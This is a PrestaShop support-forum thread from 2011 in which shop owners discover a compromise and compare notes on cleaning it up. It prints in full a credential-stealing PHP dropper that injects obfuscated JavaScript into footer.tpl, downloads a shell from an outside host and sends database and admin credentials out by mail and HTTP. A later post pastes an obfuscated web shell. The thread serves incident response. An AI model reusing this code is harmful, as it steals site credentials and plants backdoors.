Jump to content

Footer.tpl vulnerability?


Recommended Posts

Hi all,

 

I use an SCM system, I was just about to commit some files when I see in the "unversioned" list of files a new file which I did not remember creating. It's called "her.php" and it sits under the modules directory. So I opened it with a php editor, and here is the content:

 

<?php
error_reporting(0);
$shcode = "{literal}".base64_decode("PHNjcmlwdD5TdHJpbmcucHJvdG90eXBlLmFzZD1mdW5jdGlvbigpe3JldHVybiBTdHJpbmcuZnJvbUNoYXJDb2RlO307T2JqZWN0LnByb3RvdHlwZS5hc2Q9ImUiO3RyeXtmb3IoaSBpbnt9KWlmKH5pLmluZGV4T2YoJ2FzJykpdGhyb3cgMTt9Y2F0Y2gocSl7enhjPXt9W2ldO312PWRvY3VtZW50LmNyZWF0ZVRleHROb2RlKCdhc2QnKTt2YXIgcz0iIjtmb3IoaSBpbiB2KWlmKGk9PSdjaGlsZE5vZGVzJylvPXZbaV0ubGVuZ3RoKzE7byo9MjtlPWV2YWw7bT1bMTIwLW8sOTktbywxMTYtbywzNC1vLDEwMi1vLDM0LW8sNjMtbywzNC1vLDExMi1vLDEwMy1vLDEyMS1vLDM0LW8sNzAtbyw5OS1vLDExOC1vLDEwMy1vLDQyLW8sNDMtbyw2MS1vLDEyMC1vLDk5LW8sMTE2LW8sMzQtbywxMjItbyw2My1vLDg1LW8sMTE4LW8sMTE2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbywxMDQtbywxMTYtbywxMTMtbywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2LW8sNjktbywxMTMtbywxMDItbywxMDMtbyw0Mi1vLDc5LW8sOTktbywxMTgtbywxMDYtbyw0OC1vLDEwNC1vLDExMC1vLDExMy1vLDExMy1vLDExNi1vLDQyLW8sMTAyLW8sNDgtbywxMDUtbywxMDMtbywxMTgtbyw3MC1vLDk5LW8sMTE4LW8sMTAzLW8sNDItbyw0My1vLDQ5LW8sNTItbyw0My1vLDQ1LW8sNTktbyw1Ny1vLDQzLW8sNjEtbywzNC1vLDEyMC1vLDk5LW8sMTE2LW8sMzQtbywxMjMtbyw2My1vLDg1LW8sMTE4LW8sMTE2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbywxMDQtbywxMTYtbywxMTMtbywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2LW8sNjktbywxMTMtbywxMDItbywxMDMtbyw0Mi1vLDEwMi1vLDQ4LW8sMTA1LW8sMTAzLW8sMTE4LW8sNzQtbywxMTMtbywxMTktbywxMTYtbywxMTctbyw0Mi1vLDQzLW8sNDUtbyw1OS1vLDU3LW8sNDMtbyw2MS1vLDEwMi1vLDExMy1vLDEwMS1vLDExOS1vLDExMS1vLDEwMy1vLDExMi1vLDExOC1vLDQ4LW8sMTIxLW8sMTE2LW8sMTA3LW8sMTE4LW8sMTAzLW8sNDItbywzNi1vLDYyLW8sMTA3LW8sMTA0LW8sMTE2LW8sOTktbywxMTEtbywxMDMtbywzNC1vLDExNy1vLDExNi1vLDEwMS1vLDYzLW8sNDEtbywxMDYtbywxMTgtbywxMTgtbywxMTQtbyw2MC1vLDQ5LW8sNDktbywxMDEtbywxMTAtbywxMDctbywxMDEtbywxMDktbywxMTEtbywxMDMtbywzNi1vLDQ1LW8sMTIyLW8sNDUtbywxMjMtbyw0NS1vLDM2LW8sNDgtbywxMDQtbywxMDctbywxMTAtbywxMDMtbyw5OS1vLDEyMC1vLDEwMy1vLDQ4LW8sMTAxLW8sMTEzLW8sMTExLW8sNDEtbywzNC1vLDEyMS1vLDEwNy1vLDEwMi1vLDExOC1vLDEwNi1vLDYzLW8sNTAtbywzNC1vLDEwNi1vLDEwMy1vLDEwNy1vLDEwNS1vLDEwNi1vLDExOC1vLDYzLW8sNTAtbyw2NC1vLDM2LW8sNDMtbyw2MS1vXTttbT0nJy5hc2QoKTtmb3IoaT0wO2k8bS5sZW5ndGg7aSsrKXMrPW1tKGUoIm0iKyJbIisiaSIrIl0iKSk7ZShzKTs8L3NjcmlwdD4=")."{/literal}";
$shurl = "http://www.c2bill.it/stest/chkpnt/shell.txt";  
$msgurl = "http://www.c2bill.it/stest/chkpnt/sdata.php";
$mails = "[email protected], [email protected]";
function deletedir($arg){   $d=opendir($arg);  while($f=readdir($d)){     if($f!="."&&$f!=".."){        if(is_dir($arg."/".$f))        deletedir($arg."/".$f);       else         unlink($arg."/".$f);     }  }  rmdir($arg);closedir($d);}
@include("../config/settings.inc.php");
///Host info
$hostvar = "host:".$_SERVER["HTTP_HOST"]."\n"."ref:".$_SERVER["HTTP_REFERER"]."\n"."path:".$_SERVER["SCRIPT_FILENAME"]."\n=====\n";
///Server info
$srvvar =  _DB_SERVER_."\n"._DB_USER_."\n"._DB_PASSWD_."\n"._DB_NAME_."\n"._DB_PREFIX_."\n"._COOKIE_KEY_."\n"._COOKIE_IV_."\n"._PS_VERSION_."\n=====\n";
///GET admin
mysql_connect(_DB_SERVER_,_DB_USER_,_DB_PASSWD_);
mysql_selectdb(_DB_NAME_);
$r = mysql_query("SELECT `email`, `passwd` FROM `"._DB_PREFIX_."employee` WHERE id_profile = 1");
while($ro=mysql_fetch_assoc($r)){$usrs .= $ro['email'].":".$ro['passwd']."\n";}
//Wride sploit
@deletedir("../tools/smarty/compile/");
@deletedir("../tools/smarty/cache/"); 
@deletedir("../tools/smarty_v2/"); 
@deletedir("../tools/smarty_v2/"); 
$fn = "../themes/"._THEME_NAME_."/footer.tpl";
$f = fopen($fn,"r");$ff = fread($f,filesize($fn));fclose($f);
$ff = str_replace("</body>","                                     ".$shcode."</body>",$ff);
$f = fopen($fn,"w");$rf = fwrite($f,$ff);fclose($f); 
if($rf>0) $wrres = "true"; else $wrres = "false";
//write shell
$sh = file_get_contents($shurl);
$shf = "../upload/".md5(date("r")).".php"; 
$f = fopen($shf,"w");$rf = fwrite($f,$sh);fclose($f);
$shf2 = "../download/".md5(date("r")).".php"; 
$f = fopen($shf2,"w");$rf = fwrite($f,$sh);fclose($f);
@unlink("../download/.htaccess");
$msg = $hostvar.$srvvar.$usrs."=====\nTemplate writed:".$wrres."\n=====\nShells:\n".$shf."\n".$shf2."\n=====\n";
@mail($mails,"new shop",$msg);
@file_get_contents($msgurl."?data=".base64_encode($msg));
@unlink(__FILE__);
?>

 

That looks like they're emailing all the back office user/passwords to the two emails specified at the top of the code.

 

Did someone hack into my computer and put this file there?

What do you think guys?

 

I'm running an anti-virus check obviously as I write this...

  • Like 1

Share this post


Link to post
Share on other sites

Weird, I had the same file, created today. It could be a new exploit or a timed virus that downloads this file on a given day. This is definitely created specifically for prestashop.

 

You should check your upload and download directories for php files, that are not named index.php. You should check your theme folder, footer.tpl file. It might have some new javascript at the end.

 

This file does send the username and passwords of employees. But that is useless, the passwords are hashed so you can not use them for login. But it also sends your database user name and password. You might want to change them just in case. If your mysql server is accessible externally they will be able to login.

Share this post


Link to post
Share on other sites

Thanks.

 

I posted this on Reddit at:

 

I'm getting help there. I discovered new files in the download and upload directory, as well as modifications in my theme's footer.tpl which I deleted.

 

The file was only run on my localhost, not on the live server.

Share this post


Link to post
Share on other sites

The file was not placed on the live sever, only on my local machine.

I'm running 1.4.3.0.

 

Please go to the link I posted in my previous reply to Reddit.com, as some guys helped there finding out what the script actually does.

 

The question is how it happened, and how we stop it from happening again.

Share this post


Link to post
Share on other sites

I have seen the same thing on another shop today.

Can you give us a list of 3rd party modules you use in your shop, and I can see if the same modules are used in the affected shop i found.

 

The only modules I use are the ones that came with 1.4.3.0. The only module I downloaded from prestashop.com is their own authorize.net SIM module. That's the only module I installed that did not came with Prestashop already.

Share this post


Link to post
Share on other sites

I just started using PrestaShop a few days ago to discover what's it all about - It works great, despite the hack today:

 

* working on an online server, the public_html was protected by .htaccess (this protection was disabled when I found out about it).

* I can't find her.php on the server anymore (in the apache-log I can see it)

 

Is there any more information I can give to help out what this caused?

 

* PrestaShop: 1.4.4.0

* Theme: Matrice

Share this post


Link to post
Share on other sites

Hi Muller,

First of all, I want to let you know that we take this sort of situation extremely seriously, and have already assigned it as the top priority to our most qualified developer, Maxence (who as you can see, is already on the case). He is investigating it to try to locate the source, even if it is from an external module. If you would like to speak with him directly, we invite you to MP him to give him any additional information that could be helpful.

 

I will let you know as soon as I receive more news, but please just know that we are working very hard to ensure that this will not happen again, not to you or anyone else in the PrestaShop community.

 

-Mike

Share this post


Link to post
Share on other sites

We're working to find the solution for you, but in the meantime, you may want to check the suggestions posted on the reddit link that Muller posted near the top. Take those suggestions with a grain of salt, but they may be worth exploring on your local machine after a back-up.

 

-Mike

Share this post


Link to post
Share on other sites

I've checked the Apache Usage logs, couldn't find an other IP address than mine.

There was a GET command to her.php ... [23/Aug/2011:17:44:21 +0200] "GET /modules/her.php HTTP/1.1" 200 304 ...

 

In Download & Upload is a new file named: f48be302135d80a289c0e56fae37952e.php

These files are also dated 23/aug 17:44 - the same time footer.tpl changed.

 

Did it happen at the same time for everyone?

Share this post


Link to post
Share on other sites

This also happened to me, running 1.4.3

 

I couldn't find the "her.php" but my footer.tpl was definitely changed.

 

The only 3rd party module I had installed was jbx_menu.

 

Did anyone else have this happen while running 1.4.4?

Share this post


Link to post
Share on other sites

Dang it, I hope they can find the source of the problem soon. Just launched the site live, otherwise I would take it down. Might have to anyway!

 

Also, I am not familiar with the correct PrestaShop .htaccess file. How do I know what to remove from there? (I have cleaned everything else up)

Share this post


Link to post
Share on other sites

Wow, this looks serious.

I discovered today that I have the same issue. I thought that I was the only with a compromised Prestashop installation, till I read this topic.

 

I'm running a 1.4.4 version, updated from 1.4.3

 

Today, I saw that my FO was messed up: the Category block was empty, my slideshow stopped working and the footer has shifted upwards. When I use Firebug to check the html rendered code, I saw links to 2 external sites. I'm afraid I don't remember anymore which sites those were linking to...

 

I checked my footer.tpl and found weird and suspicious code at the bottom. In addition, php files were added to the /upload and /download folders. Also, the .htaccess file (to deny access) in the /download folder was gone.

 

In my case, this happened right after I've uploaded an html email file to my /mails/xx folder. This file was from someone else on the forum who I'm helping with an email layout problem. So my initial reaction was that this HTML file was somehow infected but seeing similar issues with others, I wonder if that's the case...

 

I've attached both footer.tpl (with just the weird code) and one of added php files so the developers can have a look at it.

compromised.zip

Share this post


Link to post
Share on other sites

For anyone who finds a her.php file under their modules directory, you should do the following:

- Check the file creation time, write this down and delete the file from your server.

- Go to your apache raw access logs. You should be able to access it using hosting control panel.

- Find the line that corresponds to the file creation time you wrote down earlier.

- Copy the section starting 5 minutes before to 5 minutes after. Save it in a text file and share it here.

This data would help identify the root of the problem.

 

To see if you have been attacked, check the following:

- Is there any php file under your uploads or downloads directory apart from index.php?

- Is there a strange javascript at the end of your footer.tpl file?

 

If any of the above happens, change your mysql username and password.

Share this post


Link to post
Share on other sites

Ok, at least we can rule out the jbx_menu as the source of the problem...

 

Two more things.

 

First, I didn't see a her.php file in my modules folder but still had the infected footer.tpl and the suspicious php files in upload and download folders.

 

Second, I had a quick look at my downloaded PS 1.4.4 file (from the Prestashop website) and found a .DS_Store file in the root folder. If my memory serves me well, this a (hidden) archive file from MacOS systems. This file was thus also present on my server installation during my upgrade process. Probably not related to the issue but still worth mentioning it.

Share this post


Link to post
Share on other sites

Same thing for me.... I'm not using jbx_menu but JBSlider and JBVariousLinks.

Prestashop 1.4.3 and same files in upload, dowload and code in footer.tpl into my theme folder.

 

SQL password changed... and wait...

Share this post


Link to post
Share on other sites

The .DS_store is indeed from Mac, has probably nothing to do with the problem.

 

About her.php: The file is automatically deleted, the TS was lucky to see it in time...

 

Still: shouldn't you see every action in the apache log files? Like the creation of her.php, I can't find this. Or do you need different logfiles for this? (don't know much about those log files)

Share this post


Link to post
Share on other sites

Same problem in prestashop 1.4.4 with Matrice.

 

This code was added.

 

<?php 
if (isset($_GET['session2'])){
$auth_pass = "fa816edb83e95bf0c8da580bdfd491ef";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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